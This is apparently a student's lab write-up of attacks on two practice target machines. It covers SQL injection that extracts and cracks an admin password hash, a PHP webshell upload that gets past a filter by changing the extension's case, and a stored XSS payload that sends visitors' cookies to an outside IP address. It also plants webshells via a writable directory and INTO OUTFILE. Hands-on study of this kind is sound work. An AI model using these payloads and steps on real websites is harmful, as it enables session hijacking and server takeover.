实验五

一、sql注入靶机攻击

使用nmap扫描端口 发现该ip开启了ftp和http两个服务

打开该虚拟机提供的网页 发现网站使用url传参 可能存在sql注入点

在id=1后加一个引号,网页报错 该网站存在sql注入漏洞

使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉及到四列元素

使用联合查询 查看网页的显示位

得到显示位就可以显示数据库的名字 photoblog

得到数据库名字 可以顺藤摸瓜查询数据库中有那些表

由于是要拿到 root 权限 因此我们只需关系user表中的数据 可以看出users表中有 id login password 三列元素

查看user表中的数据:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

 

 

将md5破解之后 可以得到admin的密码

登录到管理员界面 操作成功

发现网页后台有个上传文件的功能 上传一个一句话木马 然后。。就失败了

把php文件后缀名改为pHp(中间h改为大写)就可以绕过。。。。 由于被解析成图片 还可以得到他的相对地址

用菜刀连接 就可以控制该网站

 

 

二、xss靶机攻击

 netdiscover 和 nmap 双管齐下 得到靶机的网络信息 提供了80服务

登录发现是个留言板 尝试使用 xss 弹个窗

发现有弹窗回显 存在 xss 漏洞

在靶机上留言<script>document.write('<img src="http://192.168.112.132/?'+document.cookie+' "/>')</script>

可以将任意登录用户的cookie发送到指定ip 在指定 ip 接受 cookie 后可以伪造成登陆者

使用cookie登陆后是管理员权限 在网页里发现很多 url 传参的现象

 试了一下post页面好像没有注入点 换到edit页面 url后加了一个引号 页面报错 存在sql 漏洞

测试了一下,列数为4 显示位是2和3

 

由上文(一)中的逻辑 不难查询到数据库的信息

数据库名

表名  

users 表列名

 

最终得到users表中的数据

 

然后发现网页似乎有个css目录可写 留个木马在上面 岂不美哉

用菜刀连接

除了挂马 into outfile 还可以拿到 shell (将木马的 eval 改为 system 即可)

访问之 传参即可与 shell 交互

posted on 2018-05-05 08:06  P201521460044  阅读(92)  评论(0)    收藏  举报